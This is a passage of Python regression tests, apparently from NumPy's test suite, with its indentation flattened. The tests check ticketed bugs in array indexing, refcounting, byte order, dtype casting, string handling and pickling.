b = np.zeros_like(a)
np.take(x, [0, 2], axis=1, out=b)
assert_array_equal(a, b)
def test_take_object_fail(self):
# Issue gh-3001
d = 123.
a = np.array([d, 1], dtype=object)
ref_d = sys.getrefcount(d)
try:
a.take([0, 100])
except IndexError:
pass
assert_(ref_d == sys.getrefcount(d))
def test_array_str_64bit(self, level=rlevel):
"""Ticket #501"""
s = np.array([1, np.nan], dtype=np.float64)
with np.errstate(all='raise'):
sstr = np.array_str(s)
def test_frompyfunc_endian(self, level=rlevel):
"""Ticket #503"""
from math import radians
uradians = np.frompyfunc(radians, 1, 1)
big_endian = np.array([83.4, 83.5], dtype='>f8')
little_endian = np.array([83.4, 83.5], dtype='<f8')
assert_almost_equal(uradians(big_endian).astype(float),
uradians(little_endian).astype(float))
def test_mem_string_arr(self, level=rlevel):
"""Ticket #514"""
s = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
t = []
np.hstack((t, s ))
def test_arr_transpose(self, level=rlevel):
"""Ticket #516"""
x = np.random.rand(*(2,)*16)
y = x.transpose(list(range(16)))
def test_string_mergesort(self, level=rlevel):
"""Ticket #540"""
x = np.array(['a']*32)
assert_array_equal(x.argsort(kind='m'), np.arange(32))
def test_argmax_byteorder(self, level=rlevel):
"""Ticket #546"""
a = np.arange(3, dtype='>f')
assert_(a[a.argmax()] == a.max())
def test_rand_seed(self, level=rlevel):
"""Ticket #555"""
for l in np.arange(4):
np.random.seed(l)
def test_mem_deallocation_leak(self, level=rlevel):
"""Ticket #562"""
a = np.zeros(5, dtype=float)
b = np.array(a, dtype=float)
del a, b
def test_mem_on_invalid_dtype(self):
"Ticket #583"
self.assertRaises(ValueError, np.fromiter, [['12', ''], ['13', '']], str)
def test_dot_negative_stride(self, level=rlevel):
"""Ticket #588"""
x = np.array([[1, 5, 25, 125., 625]])
y = np.array([[20.], [160.], [640.], [1280.], [1024.]])
z = y[::-1].copy()
y2 = y[::-1]
assert_equal(np.dot(x, z), np.dot(x, y2))
def test_object_casting(self, level=rlevel):
# This used to trigger the object-type version of
# the bitwise_or operation, because float64 -> object
# casting succeeds
def rs():
x = np.ones([484, 286])
y = np.zeros([484, 286])
x |= y
self.assertRaises(TypeError, rs)
def test_unicode_scalar(self, level=rlevel):
"""Ticket #600"""
x = np.array(["DROND", "DROND1"], dtype="U6")
el = x[1]
new = pickle.loads(pickle.dumps(el))
assert_equal(new, el)
def test_arange_non_native_dtype(self, level=rlevel):
"""Ticket #616"""
for T in ('>f4', '<f4'):
dt = np.dtype(T)
assert_equal(np.arange(0, dtype=dt).dtype, dt)
assert_equal(np.arange(0.5, dtype=dt).dtype, dt)
assert_equal(np.arange(5, dtype=dt).dtype, dt)
def test_bool_indexing_invalid_nr_elements(self, level=rlevel):
s = np.ones(10, dtype=float)
x = np.array((15,), dtype=float)
def ia(x, s, v): x[(s>0)]=v
self.assertRaises(ValueError, ia, x, s, np.zeros(9, dtype=float))
self.assertRaises(ValueError, ia, x, s, np.zeros(11, dtype=float))
def test_mem_scalar_indexing(self, level=rlevel):
"""Ticket #603"""
x = np.array([0], dtype=float)
index = np.array(0, dtype=np.int32)
x[index]
def test_binary_repr_0_width(self, level=rlevel):
assert_equal(np.binary_repr(0, width=3), '000')
def test_fromstring(self, level=rlevel):
assert_equal(np.fromstring("12:09:09", dtype=int, sep=":"),
[12, 9, 9])
def test_searchsorted_variable_length(self, level=rlevel):
x = np.array(['a', 'aa', 'b'])
y = np.array(['d', 'e'])
assert_equal(x.searchsorted(y), [3, 3])
def test_string_argsort_with_zeros(self, level=rlevel):
"""Check argsort for strings containing zeros."""
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
assert_array_equal(x.argsort(kind='m'), np.array([1, 0]))
assert_array_equal(x.argsort(kind='q'), np.array([1, 0]))
def test_string_sort_with_zeros(self, level=rlevel):
"""Check sort for strings containing zeros."""
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
y = np.fromstring("\x00\x01\x00\x02", dtype="|S2")
assert_array_equal(np.sort(x, kind="q"), y)
def test_copy_detection_zero_dim(self, level=rlevel):
"""Ticket #658"""
np.indices((0, 3, 4)).T.reshape(-1, 3)
def test_flat_byteorder(self, level=rlevel):
"""Ticket #657"""
x = np.arange(10)
assert_array_equal(x.astype('>i4'), x.astype('<i4').flat[:])
assert_array_equal(x.astype('>i4').flat[:], x.astype('<i4'))
def test_uint64_from_negative(self, level=rlevel) :
assert_equal(np.uint64(-2), np.uint64(18446744073709551614))
def test_sign_bit(self, level=rlevel):
x = np.array([0, -0.0, 0])
assert_equal(str(np.abs(x)), '[ 0. 0. 0.]')
def test_flat_index_byteswap(self, level=rlevel):
for dt in (np.dtype('<i4'), np.dtype('>i4')):
x = np.array([-1, 0, 1], dtype=dt)
assert_equal(x.flat[0].dtype, x[0].dtype)
def test_copy_detection_corner_case(self, level=rlevel):
"""Ticket #658"""
np.indices((0, 3, 4)).T.reshape(-1, 3)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous,
# 0-sized reshape itself is tested elsewhere.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_copy_detection_corner_case2(self, level=rlevel):
"""Ticket #771: strides are not set correctly when reshaping 0-sized
arrays"""
b = np.indices((0, 3, 4)).T.reshape(-1, 3)
assert_equal(b.strides, (3 * b.itemsize, b.itemsize))
def test_object_array_refcounting(self, level=rlevel):
"""Ticket #633"""
if not hasattr(sys, 'getrefcount'):
return
# NB. this is probably CPython-specific
cnt = sys.getrefcount
a = object()
b = object()
c = object()
cnt0_a = cnt(a)
cnt0_b = cnt(b)
cnt0_c = cnt(c)
# -- 0d -> 1d broadcasted slice assignment
arr = np.zeros(5, dtype=np.object_)
arr[:] = a
assert_equal(cnt(a), cnt0_a + 5)
arr[:] = b
assert_equal(cnt(a), cnt0_a)
assert_equal(cnt(b), cnt0_b + 5)
arr[:2] = c
assert_equal(cnt(b), cnt0_b + 3)
assert_equal(cnt(c), cnt0_c + 2)
del arr
# -- 1d -> 2d broadcasted slice assignment
arr = np.zeros((5, 2), dtype=np.object_)
arr0 = np.zeros(2, dtype=np.object_)
arr0[0] = a
assert_(cnt(a) == cnt0_a + 1)
arr0[1] = b
assert_(cnt(b) == cnt0_b + 1)
arr[:,:] = arr0
assert_(cnt(a) == cnt0_a + 6)
assert_(cnt(b) == cnt0_b + 6)
arr[:, 0] = None
assert_(cnt(a) == cnt0_a + 1)
del arr, arr0
# -- 2d copying + flattening
arr = np.zeros((5, 2), dtype=np.object_)
arr[:, 0] = a
arr[:, 1] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
arr2 = arr[:, 0].copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.flatten()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
del arr, arr2
# -- concatenate, repeat, take, choose
arr1 = np.zeros((5, 1), dtype=np.object_)
arr2 = np.zeros((5, 1), dtype=np.object_)
arr1[...] = a
arr2[...] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
arr3 = np.concatenate((arr1, arr2))
assert_(cnt(a) == cnt0_a + 5 + 5)
assert_(cnt(b) == cnt0_b + 5 + 5)
arr3 = arr1.repeat(3, axis=0)
assert_(cnt(a) == cnt0_a + 5 + 3*5)
arr3 = arr1.take([1, 2, 3], axis=0)
assert_(cnt(a) == cnt0_a + 5 + 3)
x = np.array([[0], [1], [0], [1], [1]], int)
arr3 = x.choose(arr1, arr2)
assert_(cnt(a) == cnt0_a + 5 + 2)
assert_(cnt(b) == cnt0_b + 5 + 3)
def test_mem_custom_float_to_array(self, level=rlevel):
"""Ticket 702"""
class MyFloat(object):
def __float__(self):
return 1.0
tmp = np.atleast_1d([MyFloat()])
tmp2 = tmp.astype(float)
def test_object_array_refcount_self_assign(self, level=rlevel):
"""Ticket #711"""
class VictimObject(object):
deleted = False
def __del__(self):
self.deleted = True
d = VictimObject()
arr = np.zeros(5, dtype=np.object_)
arr[:] = d
del d
arr[:] = arr # refcount of 'd' might hit zero here
assert_(not arr[0].deleted)
arr[:] = arr # trying to induce a segfault by doing it again...
assert_(not arr[0].deleted)
def test_mem_fromiter_invalid_dtype_string(self, level=rlevel):
x = [1, 2, 3]
self.assertRaises(ValueError,
np.fromiter, [xi for xi in x], dtype='S')
def test_reduce_big_object_array(self, level=rlevel):
"""Ticket #713"""
oldsize = np.setbufsize(10*16)
a = np.array([None]*161, object)
assert_(not np.any(a))
np.setbufsize(oldsize)
def test_mem_0d_array_index(self, level=rlevel):
"""Ticket #714"""
np.zeros(10)[np.array(0)]
def test_floats_from_string(self, level=rlevel):
"""Ticket #640, floats from string"""
fsingle = np.single('1.234')
fdouble = np.double('1.234')
flongdouble = np.longdouble('1.234')
assert_almost_equal(fsingle, 1.234)
assert_almost_equal(fdouble, 1.234)
assert_almost_equal(flongdouble, 1.234)
def test_nonnative_endian_fill(self, level=rlevel):
""" Non-native endian arrays were incorrectly filled with scalars before
r5034.
"""
if sys.byteorder == 'little':
dtype = np.dtype('>i4')
else:
dtype = np.dtype('<i4')
x = np.empty([1], dtype=dtype)
x.fill(1)
assert_equal(x, np.array([1], dtype=dtype))
def test_dot_alignment_sse2(self, level=rlevel):
"""Test for ticket #551, changeset r5140"""
x = np.zeros((30, 40))
y = pickle.loads(pickle.dumps(x))
# y is now typically not aligned on a 8-byte boundary
z = np.ones((1, y.shape[0]))
# This shouldn't cause a segmentation fault:
np.dot(z, y)
def test_astype_copy(self, level=rlevel):
"""Ticket #788, changeset r5155"""
# The test data file was generated by scipy.io.savemat.
# The dtype is float64, but the isbuiltin attribute is 0.
data_dir = path.join(path.dirname(__file__), 'data')
filename = path.join(data_dir, "astype_copy.pkl")
if sys.version_info[0] >= 3:
f = open(filename, 'rb')
xp = pickle.load(f, encoding='latin1')
f.close()
else:
f = open(filename)
xp = pickle.load(f)
f.close()
xpd = xp.astype(np.float64)
assert_((xp.__array_interface__['data'][0] !=
xpd.__array_interface__['data'][0]))
def test_compress_small_type(self, level=rlevel):
"""Ticket #789, changeset 5217.
"""
# compress with out argument segfaulted if cannot cast safely
import numpy as np
a = np.array([[1, 2], [3, 4]])
b = np.zeros((2, 1), dtype = np.single)
try:
a.compress([True, False], axis = 1, out = b)
raise AssertionError("compress with an out which cannot be " \
"safely casted should not return "\
"successfully")
except TypeError:
pass
def test_attributes(self, level=rlevel):
"""Ticket #791
"""
class TestArray(np.ndarray):
def __new__(cls, data, info):
result = np.array(data)
result = result.view(cls)
result.info = info
return result
def __array_finalize__(self, obj):
self.info = getattr(obj, 'info', '')
dat = TestArray([[1, 2, 3, 4], [5, 6, 7, 8]], 'jubba')
assert_(dat.info == 'jubba')
dat.resize((4, 2))
assert_(dat.info == 'jubba')
dat.sort()
assert_(dat.info == 'jubba')
dat.fill(2)
assert_(dat.info == 'jubba')
dat.put([2, 3, 4], [6, 3, 4])
assert_(dat.info == 'jubba')
dat.setfield(4, np.int32, 0)
assert_(dat.info == 'jubba')
dat.setflags()
assert_(dat.info == 'jubba')
assert_(dat.all(1).info == 'jubba')
assert_(dat.any(1).info == 'jubba')
assert_(dat.argmax(1).info == 'jubba')
assert_(dat.argmin(1).info == 'jubba')
assert_(dat.argsort(1).info == 'jubba')
assert_(dat.astype(TestArray).info == 'jubba')
assert_(dat.byteswap().info == 'jubba')
assert_(dat.clip(2, 7).info == 'jubba')
assert_(dat.compress([0, 1, 1]).info == 'jubba')
assert_(dat.conj().info == 'jubba')
assert_(dat.conjugate().info == 'jubba')
assert_(dat.copy().info == 'jubba')
dat2 = TestArray([2, 3, 1, 0], 'jubba')
choices = [[0, 1, 2, 3], [10, 11, 12, 13],
[20, 21, 22, 23], [30, 31, 32, 33]]
assert_(dat2.choose(choices).info == 'jubba')
assert_(dat.cumprod(1).info == 'jubba')
assert_(dat.cumsum(1).info == 'jubba')
assert_(dat.diagonal().info == 'jubba')
assert_(dat.flatten().info == 'jubba')
assert_(dat.getfield(np.int32, 0).info == 'jubba')
assert_(dat.imag.info == 'jubba')
assert_(dat.max(1).info == 'jubba')
assert_(dat.mean(1).info == 'jubba')
assert_(dat.min(1).info == 'jubba')
assert_(dat.newbyteorder().info == 'jubba')
assert_(dat.nonzero()[0].info == 'jubba')
assert_(dat.nonzero()[1].info == 'jubba')
assert_(dat.prod(1).info == 'jubba')
assert_(dat.ptp(1).info == 'jubba')
assert_(dat.ravel().info == 'jubba')
assert_(dat.real.info == 'jubba')
assert_(dat.repeat(2).info == 'jubba')
assert_(dat.reshape((2, 4)).info == 'jubba')
assert_(dat.round().info == 'jubba')
assert_(dat.squeeze().info == 'jubba')
assert_(dat.std(1).info == 'jubba')
assert_(dat.sum(1).info == 'jubba')
assert_(dat.swapaxes(0, 1).info == 'jubba')
assert_(dat.take([2, 3, 5]).info == 'jubba')
assert_(dat.transpose().info == 'jubba')
assert_(dat.T.info == 'jubba')
assert_(dat.var(1).info == 'jubba')
assert_(dat.view(TestArray).info == 'jubba')
def test_recarray_tolist(self, level=rlevel):
"""Ticket #793, changeset r5215
"""
# Comparisons fail for NaN, so we can't use random memory
# for the test.
buf = np.zeros(40, dtype=np.int8)
a = np.recarray(2, formats="i4,f8,f8", names="id,x,y", buf=buf)
b = a.tolist()
assert_( a[0].tolist() == b[0])
assert_( a[1].tolist() == b[1])
def test_nonscalar_item_method(self):
# Make sure that .item() fails gracefully when it should
a = np.arange(5)
assert_raises(ValueError, a.item)
def test_char_array_creation(self, level=rlevel):
a = np.array('123', dtype='c')
b = np.array(asbytes_nested(['1', '2', '3']))
assert_equal(a, b)
def test_unaligned_unicode_access(self, level=rlevel) :
"""Ticket #825"""
for i in range(1, 9) :
msg = 'unicode offset: %d chars'%i
t = np.dtype([('a', 'S%d'%i), ('b', 'U2')])
x = np.array([(asbytes('a'), sixu('b'))], dtype=t)
if sys.version_info[0] >= 3:
assert_equal(str(x), "[(b'a', 'b')]", err_msg=msg)
else:
assert_equal(str(x), "[('a', u'b')]", err_msg=msg)
def test_sign_for_complex_nan(self, level=rlevel):
"""Ticket 794."""
with np.errstate(invalid='ignore'):
C = np.array([-np.inf, -2+1j, 0, 2-1j, np.inf, np.nan])
have = np.sign(C)
want = np.array([-1+0j, -1+0j, 0+0j, 1+0j, 1+0j, np.nan])
assert_equal(have, want)
def test_for_equal_names(self, level=rlevel):
"""Ticket #674"""
dt = np.dtype([('foo', float), ('bar', float)])
a = np.zeros(10, dt)
b = list(a.dtype.names)
b[0] = "notfoo"
a.dtype.names = b
assert_(a.dtype.names[0] == "notfoo")
assert_(a.dtype.names[1] == "bar")
def test_for_object_scalar_creation(self, level=rlevel):
"""Ticket #816"""
a = np.object_()
b = np.object_(3)
b2 = np.object_(3.0)
c = np.object_([4, 5])
d = np.object_([None, {}, []])
assert_(a is None)
assert_(type(b) is int)
assert_(type(b2) is float)
assert_(type(c) is np.ndarray)
assert_(c.dtype == object)
assert_(d.dtype == object)
def test_array_resize_method_system_error(self):
"""Ticket #840 - order should be an invalid keyword."""
x = np.array([[0, 1], [2, 3]])
self.assertRaises(TypeError, x.resize, (2, 2), order='C')
def test_for_zero_length_in_choose(self, level=rlevel):
"Ticket #882"
a = np.array(1)
self.assertRaises(ValueError, lambda x: x.choose([]), a)
def test_array_ndmin_overflow(self):
"Ticket #947."
self.assertRaises(ValueError, lambda: np.array([1], ndmin=33))
def test_errobj_reference_leak(self, level=rlevel):
"""Ticket #955"""
with np.errstate(all="ignore"):
z = int(0)
p = np.int32(-1)
gc.collect()
n_before = len(gc.get_objects())
z**p # this shouldn't leak a reference to errobj
gc.collect()
n_after = len(gc.get_objects())
assert_(n_before >= n_after, (n_before, n_after))
def test_void_scalar_with_titles(self, level=rlevel):
"""No ticket"""
data = [('john', 4), ('mary', 5)]
dtype1 = [(('source:yy', 'name'), 'O'), (('source:xx', 'id'), int)]
arr = np.array(data, dtype=dtype1)
assert_(arr[0][0] == 'john')
assert_(arr[0][1] == 4)
def test_void_scalar_constructor(self):
#Issue #1550
#Create test string data, construct void scalar from data and assert
#that void scalar contains original data.
test_string = np.array("test")
test_string_void_scalar = np.core.multiarray.scalar(
np.dtype(("V", test_string.dtype.itemsize)), test_string.tostring())
assert_(test_string_void_scalar.view(test_string.dtype) == test_string)
#Create record scalar, construct from data and assert that
#reconstructed scalar is correct.
test_record = np.ones((), "i,i")
test_record_void_scalar = np.core.multiarray.scalar(
test_record.dtype, test_record.tostring())
assert_(test_record_void_scalar == test_record)
#Test pickle and unpickle of void and record scalars
assert_(pickle.loads(pickle.dumps(test_string)) == test_string)
assert_(pickle.loads(pickle.dumps(test_record)) == test_record)
def test_blasdot_uninitialized_memory(self):
"""Ticket #950"""
for m in [0, 1, 2]:
for n in [0, 1, 2]:
for k in range(3):
# Try to ensure that x->data contains non-zero floats
x = np.array([123456789e199], dtype=np.float64)
x.resize((m, 0))
y = np.array([123456789e199], dtype=np.float64)
y.resize((0, n))
# `dot` should just return zero (m,n) matrix
z = np.dot(x, y)
assert_(np.all(z == 0))
assert_(z.shape == (m, n))
def test_zeros(self):
"""Regression test for #1061."""
# Set a size which cannot fit into a 64 bits signed integer
sz = 2 ** 64
good = 'Maximum allowed dimension exceeded'
try:
np.empty(sz)
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_huge_arange(self):
"""Regression test for #1062."""
# Set a size which cannot fit into a 64 bits signed integer
sz = 2 ** 64
good = 'Maximum allowed size exceeded'
try:
a = np.arange(sz)
self.assertTrue(a.size == sz)  # check the created array's size, not np.size itself
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_fromiter_bytes(self):
"""Ticket #1058"""
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_array_from_sequence_scalar_array(self):
"""Ticket #1078: segfaults when creating an array with a sequence of 0d
arrays."""
a = np.array((np.ones(2), np.array(2)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], np.ones(2))
assert_equal(a[1], np.array(2))
a = np.array(((1,), np.array(1)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], (1,))
assert_equal(a[1], np.array(1))
def test_array_from_sequence_scalar_array2(self):
"""Ticket #1081: weird array with strange input..."""
t = np.array([np.array([]), np.array(0, object)])
assert_equal(t.shape, (2,))
assert_equal(t.dtype, np.dtype(object))
def test_array_too_big(self):
"""Ticket #1080."""
assert_raises(ValueError, np.zeros, [975]*7, np.int8)
assert_raises(ValueError, np.zeros, [26244]*5, np.int8)
def test_dtype_keyerrors_(self):
"""Ticket #1106."""
dt = np.dtype([('f1', np.uint)])
assert_raises(KeyError, dt.__getitem__, "f2")
assert_raises(IndexError, dt.__getitem__, 1)
assert_raises(ValueError, dt.__getitem__, 0.0)
def test_lexsort_buffer_length(self):
"""Ticket #1217, don't segfault."""
a = np.ones(100, dtype=np.int8)
b = np.ones(100, dtype=np.int32)
i = np.lexsort((a[::-1], b))
assert_equal(i, np.arange(100, dtype=np.int))
def test_object_array_to_fixed_string(self):
"""Ticket #1235."""
a = np.array(['abcdefgh', 'ijklmnop'], dtype=np.object_)
b = np.array(a, dtype=(np.str_, 8))
assert_equal(a, b)
c = np.array(a, dtype=(np.str_, 5))
assert_equal(c, np.array(['abcde', 'ijklm']))
d = np.array(a, dtype=(np.str_, 12))
assert_equal(a, d)
e = np.empty((2, ), dtype=(np.str_, 8))
e[:] = a[:]
assert_equal(a, e)
def test_unicode_to_string_cast(self):
"""Ticket #1240."""
a = np.array(
[ [sixu('abc'), sixu('\u03a3')],
[sixu('asdf'), sixu('erw')]
], dtype='U')
def fail():
b = np.array(a, 'S4')
self.assertRaises(UnicodeEncodeError, fail)
def test_mixed_string_unicode_array_creation(self):
a = np.array(['1234', sixu('123')])
assert_(a.itemsize == 16)
a = np.array([sixu('123'), '1234'])
assert_(a.itemsize == 16)
a = np.array(['1234', sixu('123'), '12345'])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('12345')])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('1234')])
assert_(a.itemsize == 16)
def test_misaligned_objects_segfault(self):
"""Ticket #1198 and #1267"""
a1 = np.zeros((10,), dtype='O,c')
a2 = np.array(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], 'S10')
a1['f0'] = a2
r = repr(a1)
np.argmax(a1['f0'])
a1['f0'][1] = "FOO"
a1['f0'] = "FOO"
a3 = np.array(a1['f0'], dtype='S')
np.nonzero(a1['f0'])
a1.sort()
a4 = copy.deepcopy(a1)
def test_misaligned_scalars_segfault(self):
"""Ticket #1267"""
s1 = np.array(('a', 'Foo'), dtype='c,O')
s2 = np.array(('b', 'Bar'), dtype='c,O')
s1['f1'] = s2['f1']
s1['f1'] = 'Baz'
def test_misaligned_dot_product_objects(self):
"""Ticket #1267"""
# This didn't require a fix, but it's worth testing anyway, because
# it may fail if .dot stops enforcing the arrays to be BEHAVED
a = np.array([[(1, 'a'), (0, 'a')], [(0, 'a'), (1, 'a')]], dtype='O,c')
b = np.array([[(4, 'a'), (1, 'a')], [(2, 'a'), (2, 'a')]], dtype='O,c')
np.dot(a['f0'], b['f0'])
def test_byteswap_complex_scalar(self):
"""Ticket #1259 and gh-441"""
for dtype in [np.dtype('<'+t) for t in np.typecodes['Complex']]:
z = np.array([2.2-1.1j], dtype)
x = z[0] # always native-endian
y = x.byteswap()
if x.dtype.byteorder == z.dtype.byteorder:
# little-endian machine
assert_equal(x, np.fromstring(y.tostring(), dtype=dtype.newbyteorder()))
else:
# big-endian machine
assert_equal(x, np.fromstring(y.tostring(), dtype=dtype))
# double check real and imaginary parts:
assert_equal(x.real, y.real.byteswap())
assert_equal(x.imag, y.imag.byteswap())
def test_structured_arrays_with_objects1(self):
"""Ticket #1299"""
stra = 'aaaa'
strb = 'bbbb'
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(x[0, 1] == x[0, 0])
def test_structured_arrays_with_objects2(self):
"""Ticket #1299 second test"""
stra = 'aaaa'
strb = 'bbbb'
numb = sys.getrefcount(strb)
numa = sys.getrefcount(stra)
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(sys.getrefcount(strb) == numb)
assert_(sys.getrefcount(stra) == numa + 2)
def test_duplicate_title_and_name(self):
"""Ticket #1254"""
def func():
x = np.dtype([(('a', 'a'), 'i'), ('b', 'i')])
self.assertRaises(ValueError, func)
def test_signed_integer_division_overflow(self):
"""Ticket #1317."""
def test_type(t):
min = np.array([np.iinfo(t).min])
min //= -1
with np.errstate(divide="ignore"):
for t in (np.int8, np.int16, np.int32, np.int64, np.int, np.long):
test_type(t)
def test_buffer_hashlib(self):
try:
from hashlib import md5
except ImportError:
from md5 import new as md5
x = np.array([1, 2, 3], dtype=np.dtype('<i4'))
assert_equal(md5(x).hexdigest(), '2a1dd1e1e59d0a384c26951e316cd7e6')
def test_numeric_handleError(self):
"""Ticket #1405"""
from numpy import numarray
# Just make sure this doesn't throw an exception
numarray.handleError(0, "")
def test_0d_string_scalar(self):
# Bug #1436; the following should succeed
np.asarray('x', '>c')
def test_log1p_compiler_shenanigans(self):
# Check if log1p is behaving on 32 bit intel systems.
assert_(np.isfinite(np.log1p(np.exp2(-53))))
def test_fromiter_comparison(self, level=rlevel):
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_fromstring_crash(self):
# Ticket #1345: the following should not cause a crash
np.fromstring(asbytes('aa, aa, 1.0'), sep=',')
def test_ticket_1539(self):
dtypes = [x for x in np.typeDict.values()
if (issubclass(x, np.number)
and not issubclass(x, np.timedelta64))]
a = np.array([], dtypes[0])
failures = []
# ignore complex warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', np.ComplexWarning)
for x in dtypes:
b = a.astype(x)
for y in dtypes:
c = a.astype(y)
try:
np.dot(b, c)
except TypeError as e:
failures.append((x, y))
if failures:
raise AssertionError("Failures: %r" % failures)
def test_ticket_1538(self):
x = np.finfo(np.float32)
for name in 'eps epsneg max min resolution tiny'.split():
assert_equal(type(getattr(x, name)), np.float32,
err_msg=name)
def test_ticket_1434(self):
# Check that the out= argument in var and std has an effect
data = np.array(((1, 2, 3), (4, 5, 6), (7, 8, 9)))
out = np.zeros((3,))
ret = data.var(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.var(axis=1))
ret = data.std(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.std(axis=1))
def test_complex_nan_maximum(self):
cnan = complex(0, np.nan)
assert_equal(np.maximum(1, cnan), cnan)
def test_subclass_int_tuple_assignment(self):
# ticket #1563
class Subclass(np.ndarray):
def __new__(cls, i):
return np.ones((i,)).view(cls)
x = Subclass(5)
x[(0,)] = 2 # shouldn't raise an exception
assert_equal(x[0], 2)
def test_ufunc_no_unnecessary_views(self):
# ticket #1548
class Subclass(np.ndarray):
pass
x = np.array([1, 2, 3]).view(Subclass)
y = np.add(x, x, x)
assert_equal(id(x), id(y))
def test_take_refcount(self):
# ticket #939
a = np.arange(16, dtype=np.float)
a.shape = (4, 4)
lut = np.ones((5 + 3, 4), np.float)
rgba = np.empty(shape=a.shape + (4,), dtype=lut.dtype)
c1 = sys.getrefcount(rgba)
try:
lut.take(a, axis=0, mode='clip', out=rgba)
except TypeError:
pass
c2 = sys.getrefcount(rgba)
assert_equal(c1, c2)
def test_fromfile_tofile_seeks(self):
# On Python 3, tofile/fromfile used to get (#1610) the Python
# file handle out of sync
f0 = tempfile.NamedTemporaryFile()
f = f0.file
f.write(np.arange(255, dtype='u1').tostring())
f.seek(20)
ret = np.fromfile(f, count=4, dtype='u1')
assert_equal(ret, np.array([20, 21, 22, 23], dtype='u1'))
assert_equal(f.tell(), 24)
f.seek(40)
np.array([1, 2, 3], dtype='u1').tofile(f)
assert_equal(f.tell(), 43)
f.seek(40)
data = f.read(3)
assert_equal(data, asbytes("\x01\x02\x03"))
f.seek(80)
f.read(4)
data = np.fromfile(f, dtype='u1', count=4)
assert_equal(data, np.array([84, 85, 86, 87], dtype='u1'))
f.close()
def test_complex_scalar_warning(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_warns(np.ComplexWarning, float, x)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
assert_equal(float(x), float(x.real))
def test_complex_scalar_complex_cast(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_equal(complex(x), 1+2j)
def test_complex_boolean_cast(self):
"""Ticket #2218"""
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = np.array([0, 0+0.5j, 0.5+0j], dtype=tp)
assert_equal(x.astype(bool), np.array([0, 1, 1], dtype=bool))
assert_(np.any(x))
assert_(np.all(x[1:]))
def test_uint_int_conversion(self):
x = 2**64 - 1
assert_equal(int(np.uint64(x)), x)
def test_duplicate_field_names_assign(self):
ra = np.fromiter(((i*3, i*2) for i in range(10)), dtype='i8,f8')
ra.dtype.names = ('f1', 'f2')
rep = repr(ra) # should not cause a segmentation fault
assert_raises(ValueError, setattr, ra.dtype, 'names', ('f1', 'f1'))
def test_eq_string_and_object_array(self):
# From e-mail thread "__eq__ with str and object" (Keith Goodman)
a1 = np.array(['a', 'b'], dtype=object)
a2 = np.array(['a', 'c'])
assert_array_equal(a1 == a2, [True, False])
assert_array_equal(a2 == a1, [True, False])
def test_nonzero_byteswap(self):
a = np.array([0x80000000, 0x00000080, 0], dtype=np.uint32)
a.dtype = np.float32
assert_equal(a.nonzero()[0], [1])
a = a.byteswap().newbyteorder()
assert_equal(a.nonzero()[0], [1]) # [0] if nonzero() ignores swap
def test_find_common_type_boolean(self):
# Ticket #1695
assert_(np.find_common_type([], ['?', '?']) == '?')
def test_empty_mul(self):
a = np.array([1.])
a[1:1] *= 2
assert_equal(a, [1.])
def test_array_side_effect(self):
assert_equal(np.dtype('S10').itemsize, 10)
A = np.array([['abc', 2], ['long ', '0123456789']], dtype=np.string_)
# This was throwing an exception because in ctors.c,
# discover_itemsize was calling PyObject_Length without checking
# the return code. This failed to get the length of the number 2,
# and the exception hung around until something checked
# PyErr_Occurred() and returned an error.
assert_equal(np.dtype('S10').itemsize, 10)
def test_any_float(self):
# all and any for floats
a = np.array([0.1, 0.9])
assert_(np.any(a))
assert_(np.all(a))
def test_large_float_sum(self):
a = np.arange(10000, dtype='f')
assert_equal(a.sum(dtype='d'), a.astype('d').sum())
def test_ufunc_casting_out(self):
a = np.array(1.0, dtype=np.float32)
b = np.array(1.0, dtype=np.float64)
c = np.array(1.0, dtype=np.float32)
np.add(a, b, out=c)
assert_equal(c, 2.0)
def test_array_scalar_contiguous(self):
# Array scalars are both C and Fortran contiguous
